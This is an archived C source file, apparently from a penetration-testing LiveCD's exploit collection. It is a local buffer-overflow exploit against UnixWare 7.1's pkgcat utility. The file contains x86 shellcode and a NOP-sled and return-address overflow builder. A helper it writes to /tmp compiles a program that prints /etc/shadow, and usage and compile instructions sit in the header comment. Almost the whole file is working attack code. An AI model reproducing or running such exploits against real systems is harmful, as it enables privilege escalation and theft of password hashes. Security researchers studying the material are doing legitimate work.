home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / sco / local / uwpkgcat.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  93 lines

  1. /**
  2.  ** UnixWare 7.1 /usr/sbin/pkgcat exploit 
  3.  
  4.  ** Prints contents of /etc/shadow (execing shell won't be enough here)
  5.  ** Demonstrates overflow in uw71's gethostbyname() and dacread permissio
  6. n
  7.  ** problems.  Use offsets of +-100.
  8.  **
  9.  ** Compile cc -o uwpkgcat uwpkgcat.c
  10.  ** run /usr/sbin/pkgcat -s `./uwpkgcat 100`:
  11.  **
  12.  ** Brock Tellier btellier@usa.net
  13.  **/ 
  14.  
  15.  
  16.  
  17. #include <stdlib.h>
  18. #include <stdio.h>
  19.  
  20. char scoshell[]= 
  21.  
  22. "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
  23. "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
  24. "\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
  25.  
  26.                        
  27.  
  28. #define LEN 3500
  29. #define NOP 0x90
  30. #define CODE "void main() { system(\"cat /etc/shadow\"); }\n"
  31.  
  32. void buildpi() {
  33.   FILE *fp;
  34.   char cc[100];
  35.   fp = fopen("/tmp/pi.c", "w");
  36.   fprintf(fp, CODE);
  37.   fclose(fp);
  38.   snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c");
  39.   system(cc);
  40.  
  41. }
  42.  
  43. int main(int argc, char *argv[]) {
  44.  
  45. long int offset=0;
  46.  
  47. int i;
  48. int buflen = LEN;
  49. long int addr;
  50. char buf[LEN];
  51. buildpi(); 
  52.  
  53.  if(argc > 3) {
  54.   fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
  55.         exit(0); 
  56.  
  57.  }
  58.  else if (argc == 2){
  59.    offset=atoi(argv[1]);
  60.    
  61.  
  62.  }
  63.  else if (argc == 3) {
  64.   offset=atoi(argv[1]);
  65.   buflen=atoi(argv[2]); 
  66.  
  67.   
  68.  
  69.  }
  70. else {
  71.    offset=100;
  72.    buflen=3000;
  73.  
  74.  }
  75.  
  76.  
  77.  
  78. addr=0x8046b75 + offset;
  79.  
  80. fprintf(stderr, "\nUnixWare 7.1 pkgcat exploit prints");
  81. fprintf(stderr, "/etc/shadow\n");
  82. fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
  83. fprintf(stderr, "Using addr: 0x%x\n", addr+offset);
  84.  
  85. memset(buf,NOP,buflen);
  86. memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
  87. for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)
  88.         *(int *)&buf[i]=addr;
  89. buf[buflen - 1] = ':';
  90.  
  91. printf(buf);
  92. exit(0);
  93. }